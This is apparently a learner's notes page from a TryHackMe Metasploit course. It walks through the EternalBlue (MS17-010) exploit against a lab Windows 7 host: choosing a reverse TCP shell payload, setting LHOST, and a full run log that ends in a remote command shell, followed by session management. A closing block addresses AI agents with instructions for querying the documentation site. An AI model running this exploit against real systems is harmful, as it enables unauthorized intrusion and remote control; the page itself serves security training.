# exploiting You can search exploits using the `search` command, obtain more information about the exploit using the `info` command, and launch the exploit using `exploit`. While the process itself is simple, remember that a successful outcome depends on a thorough understanding of services running on the target system.\ \ Most of the exploits will have a preset default payload. However, you can always use the `show payloads` command to list other commands you can use with that specific exploit. {% code title="Available payloads" %} ```shell-session msf6 exploit(windows/smb/ms17_010_eternalblue) > show payloads Compatible Payloads =================== # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 generic/custom manual No Custom Payload 1 generic/shell_bind_tcp manual No Generic Command Shell, Bind TCP Inline 2 generic/shell_reverse_tcp manual No Generic Command Shell, Reverse TCP Inline 3 windows/x64/exec manual No Windows x64 Execute Command 4 windows/x64/loadlibrary manual No Windows x64 LoadLibrary Path 5 windows/x64/messagebox manual No Windows MessageBox x64 6 windows/x64/meterpreter/bind_ipv6_tcp manual No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager 7 windows/x64/meterpreter/bind_ipv6_tcp_uuid manual No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support 8 windows/x64/meterpreter/bind_named_pipe manual No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager 9 windows/x64/meterpreter/bind_tcp manual No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager 10 windows/x64/meterpreter/bind_tcp_rc4 manual No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm) ``` {% endcode %} Once you have decided on the payload, you can use the `set payload` command to make your choice. {% code title="" %} ```shell-session msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload 2 payload => generic/shell_reverse_tcp msf6 exploit(windows/smb/ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Payload options (generic/shell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs msf6 exploit(windows/smb/ms17_010_eternalblue) > ``` {% endcode %} Note that choosing a working payload could become a trial and error process due to environmental or OS restrictions such as firewall rules, anti-virus, file writing, or the program performing the payload execution isn't available (eg. payload/python/shell\_reverse\_tcp). Some payloads will open new parameters that you may need to set, running the `show options` command once more can show these. As you can see in the above example, a reverse payload will at least require you to set the `LHOST` option. Setting the LHOST value and running the exploit ```shell-session msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.186.44 lhost => 10.10.186.44 msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 10.10.186.44:4444 [*] 10.10.12.229:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 10.10.12.229:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [*] 10.10.12.229:445 - Scanned 1 of 1 hosts (100% complete) [*] 10.10.12.229:445 - Connecting to target for exploitation. [+] 10.10.12.229:445 - Connection established for exploitation. [+] 10.10.12.229:445 - Target OS selected valid for OS indicated by SMB reply [*] 10.10.12.229:445 - CORE raw buffer dump (42 bytes) [*] 10.10.12.229:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes [*] 10.10.12.229:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv [*] 10.10.12.229:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 [+] 10.10.12.229:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 10.10.12.229:445 - Trying exploit with 12 Groom Allocations. [*] 10.10.12.229:445 - Sending all but last fragment of exploit packet [*] 10.10.12.229:445 - Starting non-paged pool grooming [+] 10.10.12.229:445 - Sending SMBv2 buffers [+] 10.10.12.229:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 10.10.12.229:445 - Sending final SMBv2 buffers. [*] 10.10.12.229:445 - Sending last fragment of exploit packet! [*] 10.10.12.229:445 - Receiving response from exploit packet [+] 10.10.12.229:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 10.10.12.229:445 - Sending egg to corrupted connection. [*] 10.10.12.229:445 - Triggering free of corrupted buffer. [*] Command shell session 1 opened (10.10.186.44:4444 -> 10.10.12.229:49366) at 2021-08-20 04:51:19 +0100 C:\Windows\system32> ``` Once a session is opened, you can background it using `CTRL+Z` or abort it using `CTRL+C`. Backgrounding a session will be useful when working on more than one target simultaneously or on the same target with a different exploit and/or shell. {% code title="Backgrounding the session" %} ```shell-session C:\Windows\system32>^Z Background session 1? [y/N] y msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell x64/windows Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.10.186.44:4444 -> 10.10.12.229:49366 (10.10.12.229) msf6 exploit(windows/smb/ms17_010_eternalblue) > ``` {% endcode %} ### Working with sessions The `sessions` command will list all active sessions. The `sessions` command supports a number of options that will help you manage sessions better. Sessions help menu ```shell-session msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -h Usage: sessions [options] or sessions [id] Active session manipulation and interaction. OPTIONS: -C Run a Meterpreter Command on the session given with -i, or all -K Terminate all sessions -S Row search filter. -c Run a command on the session given with -i, or all -d List all inactive sessions -h Help banner -i Interact with the supplied session ID -k Terminate sessions by session ID and/or range -l List all active sessions -n Name or rename a session by ID -q Quiet mode -s Run a script or module on the session given with -i, or all -t Set a response timeout (default: 15) -u Upgrade a shell to a meterpreter session on many platforms -v List all active sessions in verbose mode -x Show extended information in the session table Many options allow specifying session ranges using commas and dashes. For example: sessions -s checkvm -i 1,3-5 or sessions -k 1-2,5,6 msf6 exploit(windows/smb/ms17_010_eternalblue) > ``` You can interact with any existing session using the `sessions -i` command followed by the session ID. {% code title="" %} ```shell-session msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell x64/windows Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.10.186.44:4444 -> 10.10.12.229:49366 (10.10.12.229) msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1 [*] Starting interaction with 1... C:\Windows\system32> ``` {% endcode %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://shafagh.gitbook.io/try-hack-me/complete-begginer/metasploit/exploiting.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.